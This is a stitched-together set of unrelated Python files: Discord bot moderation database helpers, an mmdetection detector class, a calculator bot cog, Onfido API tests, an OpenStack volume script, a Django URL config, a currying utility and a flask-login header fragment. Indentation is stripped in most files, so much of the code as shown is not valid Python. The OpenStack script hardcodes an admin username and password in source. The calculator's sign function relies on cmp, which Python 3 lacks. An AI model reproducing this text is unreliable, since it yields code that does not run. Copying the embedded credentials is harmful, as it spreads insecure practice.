await models.Staff.create(id=user_id, position=position, console=console)
async def remove_staff(user_id: int):
staff = await get_staff(user_id)
if staff:
if staff.console:
await staff.update(position="Helper").apply()
else:
await staff.delete()
async def remove_helper(user_id: int):
helper = await get_helper(user_id)
if helper:
if helper.position != "Helper":
await helper.update(console=None).apply()
else:
await helper.delete()
async def get_staff_all():
return await models.Staff.query.where(models.Staff.position != 'Helper').gino.all()
async def get_staff(user_id: int):
return await models.Staff.query.where(
(models.Staff.position != 'Helper') & (models.Staff.id == user_id)).gino.first()
async def get_helpers():
return await models.Staff.query.where(models.Staff.console.isnot(None)).gino.all()
async def get_helper(user_id: int):
return await models.Staff.query.where(models.Staff.id == user_id).gino.first()
async def add_warn(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await add_dbmember_if_not_exist(issuer_id)
await models.Warn.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def copy_warn(user_id: int, warn: models.Warn):
await add_dbmember_if_not_exist(user_id)
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
while await get_warn(warn.id):
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
warn.user = user_id
await warn.create()
async def get_warn(warn_id: int):
return await models.Warn.get(warn_id)
async def get_warns(user_id: int):
return await models.Warn.query.where(models.Warn.user == user_id).gino.all()
async def remove_warn_id(user_id: int, index: int):
warn = await models.Warn.query.where(models.Warn.user == user_id).offset(index - 1).gino.first()
await warn.delete()
async def remove_warns(user_id: int):
n_warns = await (models.db.select([models.db.func.count()]).where(models.Warn.user == user_id).gino.scalar())
if n_warns:
await models.Warn.delete.where(models.Warn.user == user_id).gino.status()
return n_warns
async def add_timed_restriction(user_id: int, end_date: datetime.datetime, type: str):
await add_dbmember_if_not_exist(user_id)
await models.TimedRestriction.create(id=generate_id(), user=user_id, type=type,
end_date=end_date)
async def get_time_restrictions_by_user(user_id: int):
return await models.TimedRestriction.query.where(models.TimedRestriction.user == user_id).gino.all()
async def get_time_restrictions_by_user_type(user_id: int, type: str):
return await models.TimedRestriction.query.where((models.TimedRestriction.user == user_id) & (
models.TimedRestriction.type == type)).gino.first()
async def get_time_restrictions_by_type(type: str):
return await models.TimedRestriction.query.where(models.TimedRestriction.type == type).gino.all()
async def remove_timed_restriction(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.delete()
async def set_time_restriction_alert(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.update(alerted=True).apply()
async def add_timed_role(user_id: int, role_id: int, expiring_date: datetime.datetime):
await add_dbmember_if_not_exist(user_id)
entry = await get_time_role_by_user_type(user_id, role_id)
if not entry:
return await models.TimedRole.create(id=generate_id(), user_id=user_id, role_id=role_id, expiring_date=expiring_date)
await entry.update(expiring_date=expiring_date).apply()
return entry
async def remove_timed_role(user_id: int, role_id: int):
timed_role = await get_time_role_by_user_type(user_id, role_id)
if timed_role:
await timed_role.delete()
async def get_time_role_by_user_type(user_id: int, role_id: int):
return await models.TimedRole.query.where(
(models.TimedRole.user_id == user_id) & (models.TimedRole.role_id == role_id)).gino.first()
async def get_timed_roles():
return await models.TimedRole.query.gino.all()
async def add_flag(name: str):
await models.Flag.create(name=name)
async def get_flag(name: str):
if flag := await models.Flag.get(name):
return flag.value
return None
async def remove_flag(name: str):
    # Fetch the model directly: get_flag() returns the boolean value, not the row.
    flag = await models.Flag.get(name)
    if flag:
        await flag.delete()
async def set_flag(name: str, value: bool):
    flag = await models.Flag.get(name)
    if flag:
        await flag.update(value=value).apply()
async def add_softban(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await models.Softban.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def remove_softban(user_id: int):
softban = await get_softban(user_id)
if softban:
await softban.delete()
async def add_dbmember(user_id: int):
return await models.Member.create(id=user_id)
async def add_dbmember_if_not_exist(user_id: int):
db_member = await get_dbmember(user_id)
if not db_member:
db_member = await add_dbmember(user_id)
return db_member
async def get_dbmember(user_id: int):
return await models.Member.get(user_id)
async def add_dbchannel(channel_id: int, name: str):
return await models.Channel.create(id=channel_id, name=name)
async def get_dbchannel(channel_id: int):
return await models.Channel.get(channel_id)
async def add_dbrole(role_id: int, name: str):
return await models.Role.create(id=role_id, name=name)
async def get_dbrole(role_id: int):
return await models.Role.get(role_id)
async def get_softban(user_id: int):
return await models.Softban.query.where(models.Softban.user == user_id).gino.first()
async def add_watch(user_id: int):
db_member = await add_dbmember_if_not_exist(user_id)
await db_member.update(watched=True).apply()
async def remove_watch(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
await db_member.update(watched=False).apply()
async def is_watched(user_id: int):
db_member = await get_dbmember(user_id)
return db_member.watched if db_member else False
async def add_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if not db_channel:
db_channel = await add_dbchannel(channel.id, channel.name)
await db_channel.update(nofilter=True).apply()
async def remove_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if db_channel:
        await db_channel.update(nofilter=False).apply()
async def check_nofilter(channel: TextChannel):
channel = await models.Channel.get(channel.id)
return channel.nofilter if channel else False
async def add_friendcode_3ds(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_3ds=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_3ds=fc)
async def add_friendcode_switch(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_switch=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_switch=fc)
async def get_friendcode(user_id: int):
return await models.FriendCode.get(user_id)
async def delete_friendcode_3ds(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_3ds=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def delete_friendcode_switch(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_switch=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def add_rule(number: int, description: str):
rule = await get_rule(number)
if not rule:
await models.Rule.create(id=number, description=description)
async def edit_rule(number: int, description: str):
rule = await get_rule(number)
if rule:
await rule.update(description=description).apply()
async def delete_rule(number: int):
rule = await get_rule(number)
if rule:
await rule.delete()
async def get_rules():
return await models.Rule.query.order_by(models.Rule.id).gino.all()
async def get_rule(number: int):
return await models.Rule.get(number)
async def add_reminder(date: datetime.datetime, author: int, reminder: str):
await add_dbmember_if_not_exist(author)
await models.RemindMeEntry.create(id=generate_id(), date=date, author=author, reminder=reminder)
async def get_reminders() -> list[models.RemindMeEntry]:
return await models.RemindMeEntry.query.order_by(models.RemindMeEntry.date).gino.all()
async def remove_reminder(reminder_id: int):
db_reminder = await models.RemindMeEntry.get(reminder_id)
await db_reminder.delete()
async def create_tag(title: str, content: str, author: int):
await add_dbmember_if_not_exist(author)
await models.Tag.create(id=generate_id(), title=title, content=content, author=author)
async def get_tag(title: str) -> models.Tag:
return await models.Tag.query.where(models.Tag.title == title).gino.first()
async def get_tags() -> list[models.Tag]:
return await models.Tag.query.order_by(models.Tag.id).gino.all()
async def search_tags(query: str) -> list[models.Tag]:
return await models.Tag.query.where(models.Tag.title.ilike(f"%{query}%")).limit(10).gino.all()
async def delete_tag(title: str):
db_tag = await get_tag(title)
await db_tag.delete()
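# A minimal usage sketch, assuming the Gino engine behind `models` is already
# bound; the IDs and reason below are illustrative only.
async def _demo_warn_flow():
    await add_warn(user_id=1234, issuer_id=5678, reason="spam")
    warns = await get_warns(1234)
    print(f"{len(warns)} warning(s) on record for user 1234")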
|
import torch
import torch.nn as nn
from .base import BaseDetector
from .test_mixins import RPNTestMixin, BBoxTestMixin, MaskTestMixin
from .. import builder
from ..registry import DETECTORS
from mmdet.core import bbox2roi, bbox2result, build_assigner, build_sampler
@DETECTORS.register_module
class TwoStageDetector(BaseDetector, RPNTestMixin, BBoxTestMixin,
MaskTestMixin):
def __init__(self,
backbone,
neck=None,
shared_head=None,
rpn_head=None,
bbox_roi_extractor=None,
bbox_head=None,
mask_roi_extractor=None,
mask_head=None,
train_cfg=None,
test_cfg=None,
pretrained=None):
super(TwoStageDetector, self).__init__()
self.backbone = builder.build_backbone(backbone)
if neck is not None:
self.neck = builder.build_neck(neck)
if shared_head is not None:
self.shared_head = builder.build_shared_head(shared_head)
if rpn_head is not None:
self.rpn_head = builder.build_head(rpn_head)
if bbox_head is not None:
self.bbox_roi_extractor = builder.build_roi_extractor(
bbox_roi_extractor)
self.bbox_head = builder.build_head(bbox_head)
if mask_head is not None:
if mask_roi_extractor is not None:
self.mask_roi_extractor = builder.build_roi_extractor(
mask_roi_extractor)
self.share_roi_extractor = False
else:
self.share_roi_extractor = True
self.mask_roi_extractor = self.bbox_roi_extractor
self.mask_head = builder.build_head(mask_head)
self.train_cfg = train_cfg
self.test_cfg = test_cfg
self.init_weights(pretrained=pretrained)
@property
def with_rpn(self):
return hasattr(self, 'rpn_head') and self.rpn_head is not None
def init_weights(self, pretrained=None):
super(TwoStageDetector, self).init_weights(pretrained)
self.backbone.init_weights(pretrained=pretrained)
if self.with_neck:
if isinstance(self.neck, nn.Sequential):
for m in self.neck:
m.init_weights()
else:
self.neck.init_weights()
if self.with_shared_head:
self.shared_head.init_weights(pretrained=pretrained)
if self.with_rpn:
self.rpn_head.init_weights()
if self.with_bbox:
self.bbox_roi_extractor.init_weights()
self.bbox_head.init_weights()
if self.with_mask:
self.mask_head.init_weights()
if not self.share_roi_extractor:
self.mask_roi_extractor.init_weights()
def extract_feat(self, img):
x = self.backbone(img)
if self.with_neck:
x = self.neck(x)
return x
def forward_train(self,
img,
img_meta,
gt_bboxes,
gt_labels,
gt_bboxes_ignore=None,
gt_masks=None,
proposals=None):
x = self.extract_feat(img)
losses = dict()
# RPN forward and loss
if self.with_rpn:
rpn_outs = self.rpn_head(x)
rpn_loss_inputs = rpn_outs + (gt_bboxes, img_meta,
self.train_cfg.rpn)
rpn_losses = self.rpn_head.loss(
*rpn_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
losses.update(rpn_losses)
proposal_cfg = self.train_cfg.get('rpn_proposal',
self.test_cfg.rpn)
proposal_inputs = rpn_outs + (img_meta, proposal_cfg)
proposal_list = self.rpn_head.get_bboxes(*proposal_inputs)
else:
proposal_list = proposals
# assign gts and sample proposals
if self.with_bbox or self.with_mask:
bbox_assigner = build_assigner(self.train_cfg.rcnn.assigner)
bbox_sampler = build_sampler(
self.train_cfg.rcnn.sampler, context=self)
num_imgs = img.size(0)
if gt_bboxes_ignore is None:
gt_bboxes_ignore = [None for _ in range(num_imgs)]
sampling_results = []
for i in range(num_imgs):
assign_result = bbox_assigner.assign(proposal_list[i],
gt_bboxes[i],
gt_bboxes_ignore[i],
gt_labels[i])
sampling_result = bbox_sampler.sample(
assign_result,
proposal_list[i],
gt_bboxes[i],
gt_labels[i],
feats=[lvl_feat[i][None] for lvl_feat in x])
sampling_results.append(sampling_result)
# bbox head forward and loss
if self.with_bbox:
rois = bbox2roi([res.bboxes for res in sampling_results])
# TODO: a more flexible way to decide which feature maps to use
bbox_feats = self.bbox_roi_extractor(
x[:self.bbox_roi_extractor.num_inputs], rois)
if self.with_shared_head:
bbox_feats = self.shared_head(bbox_feats)
cls_score, bbox_pred = self.bbox_head(bbox_feats)
bbox_targets = self.bbox_head.get_target(sampling_results,
gt_bboxes, gt_labels,
self.train_cfg.rcnn)
loss_bbox = self.bbox_head.loss(cls_score, bbox_pred,
*bbox_targets)
losses.update(loss_bbox)
# mask head forward and loss
if self.with_mask:
if not self.share_roi_extractor:
pos_rois = bbox2roi(
[res.pos_bboxes for res in sampling_results])
mask_feats = self.mask_roi_extractor(
x[:self.mask_roi_extractor.num_inputs], pos_rois)
if self.with_shared_head:
mask_feats = self.shared_head(mask_feats)
else:
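                # Shared RoI extractor: reuse bbox_feats and build a boolean
                # mask that selects only the rows for positive samples.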
pos_inds = []
device = bbox_feats.device
for res in sampling_results:
pos_inds.append(
torch.ones(
res.pos_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds.append(
torch.zeros(
res.neg_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds = torch.cat(pos_inds)
mask_feats = bbox_feats[pos_inds]
mask_pred = self.mask_head(mask_feats)
mask_targets = self.mask_head.get_target(sampling_results,
gt_masks,
self.train_cfg.rcnn)
pos_labels = torch.cat(
[res.pos_gt_labels for res in sampling_results])
loss_mask = self.mask_head.loss(mask_pred, mask_targets,
pos_labels)
losses.update(loss_mask)
return losses
def simple_test(self, img, img_meta, proposals=None, rescale=False):
"""Test without augmentation."""
assert self.with_bbox, "Bbox head must be implemented."
x = self.extract_feat(img)
proposal_list = self.simple_test_rpn(
x, img_meta, self.test_cfg.rpn) if proposals is None else proposals
det_bboxes, det_labels = self.simple_test_bboxes(
x, img_meta, proposal_list, self.test_cfg.rcnn, rescale=rescale)
bbox_results = bbox2result(det_bboxes, det_labels,
self.bbox_head.num_classes)
if not self.with_mask:
return bbox_results
else:
segm_results = self.simple_test_mask(
x, img_meta, det_bboxes, det_labels, rescale=rescale)
return bbox_results, segm_results
def aug_test(self, imgs, img_metas, rescale=False):
"""Test with augmentations.
If rescale is False, then returned bboxes and masks will fit the scale
of imgs[0].
"""
# recompute feats to save memory
proposal_list = self.aug_test_rpn(
self.extract_feats(imgs), img_metas, self.test_cfg.rpn)
det_bboxes, det_labels = self.aug_test_bboxes(
self.extract_feats(imgs), img_metas, proposal_list,
self.test_cfg.rcnn)
if rescale:
_det_bboxes = det_bboxes
else:
_det_bboxes = det_bboxes.clone()
_det_bboxes[:, :4] *= img_metas[0][0]['scale_factor']
bbox_results = bbox2result(_det_bboxes, det_labels,
self.bbox_head.num_classes)
# det_bboxes always keep the original scale
if self.with_mask:
segm_results = self.aug_test_mask(
self.extract_feats(imgs), img_metas, det_bboxes, det_labels)
return bbox_results, segm_results
else:
return bbox_results
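# A hedged construction sketch: in mmdetection 1.x a TwoStageDetector is
# normally built from a config dict via the registry, roughly:
#
#     from mmdet.models import build_detector
#     model = build_detector(cfg.model, train_cfg=cfg.train_cfg, test_cfg=cfg.test_cfg)
#
# where `cfg` is a loaded mmcv Config whose model.type names a registered
# detector such as 'FasterRCNN'.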
|
from __future__ import division
import discord, math, operator
from discord.ext import commands
from pyparsing import (Literal,CaselessLiteral,Word,Combine,Group,Optional,
ZeroOrMore,Forward,nums,alphas,oneOf)
__author__ = 'Paul McGuire'
__version__ = '$Revision: 0.0 $'
__date__ = '$Date: 2009-03-20 $'
__source__ = """http://pyparsing.wikispaces.com/file/view/fourFn.py
http://pyparsing.wikispaces.com/message/view/home/15549426
"""
__note__ = """
This is a re-wrap of Paul McGuire's fourFn.py as a class, so it can
be used easily in other places of the code. Most of the work was done
by corpnewt, all I did was clean it and create the results in embeds.
Also, the messages are deleted after, except for the correct answer.
"""
class NumericStringParserForPython3(object):
"""
Most of this code comes from the fourFn.py pyparsing example
"""
def pushFirst(self, strg, loc, toks):
self.exprStack.append(toks[0])
def pushUMinus(self, strg, loc, toks):
if toks and toks[0]=='-':
self.exprStack.append('unary -')
def __init__(self):
"""
Please use any of the following symbols:
expop :: '^'
multop :: '*' | '/'
addop :: '+' | '-'
integer :: ['+' | '-'] '0'..'9'+
"""
point = Literal(".")
e = CaselessLiteral("E")
fnumber = Combine(Word("+-"+nums, nums) +
Optional(point + Optional(Word(nums))) +
Optional(e + Word("+-"+nums, nums)))
ident = Word(alphas, alphas+nums+"_$")
plus = Literal("+")
minus = Literal("-")
mult = Literal("*")
div = Literal("/")
lpar = Literal("(").suppress()
rpar = Literal(")").suppress()
addop = plus | minus
multop = mult | div
expop = Literal("^")
pi = CaselessLiteral("PI")
expr = Forward()
atom = ((Optional(oneOf("- +")) +
(pi|e|fnumber|ident+lpar+expr+rpar).setParseAction(self.pushFirst))
| Optional(oneOf("- +")) + Group(lpar+expr+rpar)
).setParseAction(self.pushUMinus)
# by defining exponentiation as "atom [ ^ factor ]..." instead of
# "atom [ ^ atom ]...", we get right-to-left exponents, instead of left-to-right
# that is, 2^3^2 = 2^(3^2), not (2^3)^2.
factor = Forward()
factor << atom + ZeroOrMore((expop + factor).setParseAction(self.pushFirst))
term = factor + ZeroOrMore((multop + factor).setParseAction(self.pushFirst))
expr << term + ZeroOrMore((addop + term).setParseAction(self.pushFirst))
# addop_term = (addop + term).setParseAction(self.pushFirst)
# general_term = term + ZeroOrMore(addop_term) | OneOrMore(addop_term)
# expr << general_term
self.bnf = expr
# this will map operator symbols to their corresponding arithmetic operations
epsilon = 1e-12
self.opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
"^" : operator.pow }
self.fn = {
"sin" : math.sin,
"cos" : math.cos,
"tan" : math.tan,
"abs" : abs,
"trunc" : lambda a: int(a),
"round" : round,
"sgn" : lambda a: abs(a)>epsilon and cmp(a,0) or 0}
def evaluateStack(self, s):
op = s.pop()
if op == 'unary -':
return -self.evaluateStack(s)
if op in "+-*/^":
op2 = self.evaluateStack(s)
op1 = self.evaluateStack(s)
return self.opn[op](op1, op2)
elif op == "PI":
return math.pi # 3.1415926535
elif op == "E":
return math.e # 2.718281828
elif op in self.fn:
return self.fn[op](self.evaluateStack(s))
elif op[0].isalpha():
return 0
else:
return float(op)
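    # Note: unknown alphabetic identifiers fall through to the isalpha() branch
    # above and evaluate to 0, so a typo such as "sinn(1)" silently yields 0
    # instead of raising; callers wanting strict validation should check the
    # function name against self.fn first.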
def eval(self,num_string,parseAll=True):
self.exprStack=[]
results=self.bnf.parseString(num_string,parseAll)
val=self.evaluateStack(self.exprStack[:])
return val
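# A quick worked example of the right-associative exponent rule noted above:
# 2^3^2 parses as 2^(3^2) = 512, not (2^3)^2 = 64. For instance:
#
#     >>> NumericStringParserForPython3().eval("2^3^2")
#     512.0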
class Calculator:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot):
self.bot = bot
self.nsp=NumericStringParserForPython3()
self.user_color = discord.Colour(0xed791d) ## orange
self.mod_color = discord.Colour(0x7289da) ## blurple
@commands.command(description='Scientific calculator', aliases=['calculate', 'maths'])
async def calc(self, ctx, *, formula = None):
""" ✔ Do some math
thanks to Paul McGuire's fourFn.py. """
        person = ctx.message.author
        if formula is None:
            # Can't calculate an empty message, so show usage instead.
            msg = f'\u200BUsage: `{ctx.prefix}{ctx.invoked_with} [any maths formula]`'
            e = discord.Embed(color=self.user_color)
            e.description = msg
            try:
                await ctx.send(embed=e, delete_after=23)
            except discord.HTTPException:
                await ctx.send(msg, delete_after=23)
            return
        formula = formula.replace('x', '*').replace(' minus ', '-').replace(' plus ', '+').replace(' into ', '/') \
            .replace(' sub ', '-').replace(' pi ', 'PI').replace(' divide ', '/').replace(' multiply ', '*') \
            .replace(' add ', '+').replace(' div ', '/').replace(' multi ', '*').replace(' mul ', '*') \
            .replace('π', 'PI').replace('÷', '/')
try:
            answer = self.nsp.eval(formula)
        except Exception:
# If there's a problem in the input, show examples
msg = f'\N{THINKING FACE} wrong `{formula}` input.\n\nTry any of these:'
e = discord.Embed(color=self.user_color)
e.description = f'\u200B{msg}'
e.add_field(name='multiply', value='`2 * 3 x 5 multiply 7`')
e.add_field(name='divide', value='`91 / 5 divide 3 into 2 ÷ 4`')
e.add_field(name='add', value='`1 + 4 plus 8 add 23`')
            e.add_field(name='subtract', value='`91 - 35 minus 3 sub 12`')
e.add_field(name='exponential', value="`7 ^ 5`")
e.add_field(name='Supported formulas',
value='```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```')
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
error = f'\N{THINKING FACE} wrong `{formula}` input.\n\n ' \
f'Try any of these:```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```'
await ctx.send(error, delete_after=23)
return
# Correct input prints correct answer
        duration = f'Calculated in {self.bot.ws.latency * 1000:.2f} ms'
success = round(answer, 2)
e = discord.Embed(color=self.user_color)
e.add_field(name='Input:', value=f'```py\n{formula}```', inline=True)
e.add_field(name='Result:', value=f'```css\n{success}```', inline=True)
e.set_footer(text=duration)
try:
await ctx.send(embed=e)
except discord.Forbidden: # FORBIDDEN (status code: 403): Missing Permissions
await ctx.send(f'```rust\n>Input: {formula}\nResult: {success}```')
def setup(bot):
bot.add_cog(Calculator(bot))
|
import onfido
from onfido.regions import Region
import io
api = onfido.Api("<AN_API_TOKEN>", region=Region.EU)
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
def test_upload_photo(requests_mock):
mock_upload = requests_mock.post("https://api.eu.onfido.com/v3.2/live_photos/", json=[])
sample_file = open("sample_photo.png", "rb")
request_body = {"advanced_validation": "true"}
api.live_photo.upload(sample_file, request_body)
assert mock_upload.called is True
def test_find_live_photo(requests_mock):
mock_find = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}", json=[])
api.live_photo.find(fake_uuid)
assert mock_find.called is True
def test_list_live_photos(requests_mock):
mock_list = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/?applicant_id={fake_uuid}", json=[])
api.live_photo.all(fake_uuid)
assert mock_list.called is True
def test_download_live_photo(requests_mock):
mock_download = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}/download", text="FAKE IMAGE BINARY", headers={"Content-type": "image/png"})
onfido_download = api.live_photo.download(fake_uuid)
assert mock_download.called is True
assert onfido_download.content_type == "image/png"
|
# Import the OpenStack connection class from the SDK
from openstack import connection
# Create a connection object by calling the constructor and pass the security information
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
project_name="demo",
username="admin",
password="manoj",
user_domain_id="default",
project_domain_id="default")
def create_volume(conn):
volume_properties = {'size':'2', 'name':'packtpub-volume-2'}
volume = conn.block_store.create_volume(**volume_properties)
def delete_volume(conn):
volume_id = "3b064701-aaa7-418a-9df7-cad52bd549ee"
conn.block_store.delete_volume(volume_id)
def create_snapshot(conn):
snapshot_properties = {'volume_id':'3b064701-aaa7-418a-9df7-cad52bd549ee'}
snapshot = conn.block_store.create_snapshot(**snapshot_properties)
def delete_snapshot(conn):
snapshot_id = "91ac5916-0baa-469e-ac4e-e37b2a3880dc"
conn.block_store.delete_snapshot(snapshot_id)
#create_snapshot(conn)
#delete_snapshot(conn)
#delete_volume(conn)
create_volume(conn)
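# A hedged follow-up sketch: with the same proxy, existing volumes can be
# listed to verify the create call above (the method name follows the
# openstacksdk block_store proxy; treat it as an assumption for this SDK
# version):
#
#     for volume in conn.block_store.volumes():
#         print(volume.id, volume.name, volume.status)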
|
# -*- coding: utf-8 -*-
"""Top-level package for {{ cookiecutter.project_name }}"""
__version__ = '0.0.1'
|
import numpy as np

x = np.linspace(-2.0, 2.0, 5)  # sample input; the original fragment left x undefined
print(np.tanh(x))
|
import asyncio
import aioredis
async def main():
sentinel = await aioredis.create_sentinel(
["redis://localhost:26379", "redis://sentinel2:26379"]
)
redis = sentinel.master_for("mymaster")
ok = await redis.set("key", "value")
assert ok
val = await redis.get("key", encoding="utf-8")
assert val == "value"
asyncio.run(main())
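# A hedged read-replica variant, assuming the aioredis 1.x sentinel API's
# slave_for() companion to master_for():
#
#     async def read_from_replica():
#         replica = sentinel.slave_for("mymaster")
#         return await replica.get("key", encoding="utf-8")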
|
import logging
from .DatabaseBase import DatabaseBase
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ImageResource(DatabaseBase):
def __init__(self):
super().__init__()
def get_product_images_by_id(self, id):
search_image_query = """Select * From images where productId = %s """
values = [id]
image_records = self.run_query(search_image_query, values, False)
return image_records
def get_threed_link_by_product_id(self, pid):
select_query = """ Select * from images where is3DModelType = 'Y' and productId = %s"""
values = [str(pid)]
records = self.run_query(select_query, values, True)
if records is None:
return None
return records[0]
def update_threed_link(self, url, id_list):
update_query = """UPDATE images SET threeDModelLocation = %s WHERE productId =%s and is3DModelType = 'Y' """
for id in id_list:
self.run_query(update_query, [url, id], False)
def insert_threed_model(self, url, id_list):
insert_query = """INSERT INTO images(threeDModelLocation, is3DModelType, productId) VALUES (%s, %s, %s)"""
values = []
for id in id_list:
temp = (url, 'Y', str(id))
values.append(temp)
try:
self.run_query_many(insert_query, values, True)
except Exception as e:
self.connection.rollback()
            logger.error('Exception occurred when inserting 3D model image: %s', e)
return 0
return 1
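# A minimal usage sketch, assuming DatabaseBase supplies the connection and
# run_query helpers; the product id is illustrative only.
#
#     resource = ImageResource()
#     images = resource.get_product_images_by_id(42)
#     model_row = resource.get_threed_link_by_product_id(42)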
|
"""weather_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.views.generic import RedirectView
urlpatterns = [
url(r'^$', RedirectView.as_view(url='https://github.com/brian-duffy/yoyo-test/blob/master/README.md')),
    url(r'^weather_app/', include('weather_app.urls')),
]
|
"""Utility for currying functions."""
from functools import wraps
from inspect import signature, isbuiltin, isclass
def curry(func, args=None, kwargs=None, n=None, use_defaults=False):
if use_defaults:
return CurriedDefault(func, args, kwargs, n)
return Curried(func, args, kwargs, n)
class Curried:
def __init__(self, func, args=None, kwargs=None, target_arg_count=None):
if not callable(func):
raise TypeError('first argument must be callable')
wraps(func)(self)
self.func = func
self.args = or_else(args, tuple())
self.kwargs = or_else(kwargs, dict())
self.target_arg_count = or_else(target_arg_count, get_target_arg_count(func))
def __call__(self, *new_args, **new_kwargs):
args = self.args + new_args
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
if self._have_enough_args(args, kwargs):
return self.func(*args, **kwargs)
return self._clone(args, kwargs)
def _clone(self, args, kwargs):
return Curried(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
return current_count(args, kwargs) == self.target_arg_count
class CurriedDefault(Curried):
def _clone(self, args, kwargs):
return CurriedDefault(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
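        # Accept the call either when every declared parameter is supplied, or
        # when only the non-default parameters are supplied and the defaults
        # can fill in the rest.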
count = current_count(args, kwargs)
return count == self.target_arg_count or count == (self.target_arg_count - count_defaults(self.func))
def or_else(x, default):
return x if x is not None else default
def current_count(next_args, next_kwargs):
return len(next_args) + len(next_kwargs)
def count_defaults(func):
length = 0
if func.__defaults__ is not None:
length += len(func.__defaults__)
if func.__kwdefaults__ is not None:
length += len(func.__kwdefaults__)
return length
def get_target_arg_count(func):
if isclass(func) or isbuiltin(func):
# builtins, e.g. `map`, refer to class rather than fn
func = func.__call__
sig = signature(func)
return len(sig.parameters)
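# A minimal usage sketch of curry() on a plain three-argument function; the
# function name is illustrative only.
if __name__ == '__main__':
    def add3(a, b, c):
        return a + b + c

    curried = curry(add3)
    assert curried(1)(2)(3) == 6           # one argument at a time
    assert curried(1, 2)(3) == 6           # or in groups
    assert curry(add3, n=3)(1, 2, 3) == 6  # arity given explicitly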
|
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 et:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Obsolete module: moved to `local.download_url`
"""
import warnings
warnings.warn(
"DownloadURL has been moved to datalad.local.download_url. "
"This module was deprecated in 0.16.0, and will be removed in a future "
"release. Please adjust the import.",
DeprecationWarning)
# Import command class to ease 3rd-party transitions
from datalad.local.download_url import DownloadURL
|
# -*- coding: utf-8 -*-
'''
flask.ext.login
---------------
This module provides user session management for Flask. It lets you log
your users in and out in a database-independent manner.
:copyright: (c) 2011 by Matthew Frazier.
:license: MIT/X11, see LICENSE for more details.
'''
__version_info__ = ('0', '2', '10')
__version__ = '.'.join(__version_info__)
__author__ = 'Matthew Frazier'
__license__ = 'MIT/X11'
__copyright__ = '(c) 2011 by Matthew Frazier'
__all__ = ['LoginManager']
from flask import (_request_ctx_stack, abort, current_app, flash, redirect,
request, session, url_for, has_request_context)
from flask.signals import Namespace
from werkzeug.local import LocalProxy
from werkzeug.security import safe_str_cmp
from werkzeug.urls import url_decode, url_encode
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1, md5
import hmac
import warnings
import sys
if sys.version < '3': # pragma: no cover
from urlparse import urlparse, urlunparse
else: # pragma: no cover
from urllib.parse import urlparse, urlunparse
unicode = str
_signals = Namespace()
#: A proxy for the current user. If no user is logged in, this will be an
#: anonymous user
current_user = LocalProxy(lambda: _get_user())
#: The default name of the "remember me" cookie (``remember_token``)
COOKIE_NAME = 'remember_token'
#: The default time before the "remember me" cookie expires (365 days).
COOKIE_DURATION = timedelta(days=365)
#: Whether the "remember me" cookie requires Secure; defaults to ``None``
COOKIE_SECURE = None
#: Whether the "remember me" cookie uses HttpOnly or not; defaults to ``False``
COOKIE_HTTPONLY = False
#: The default flash message to display when users need to log in.
LOGIN_MESSAGE = u'Please log in to access this page.'
#: The default flash message category to display when users need to log in.
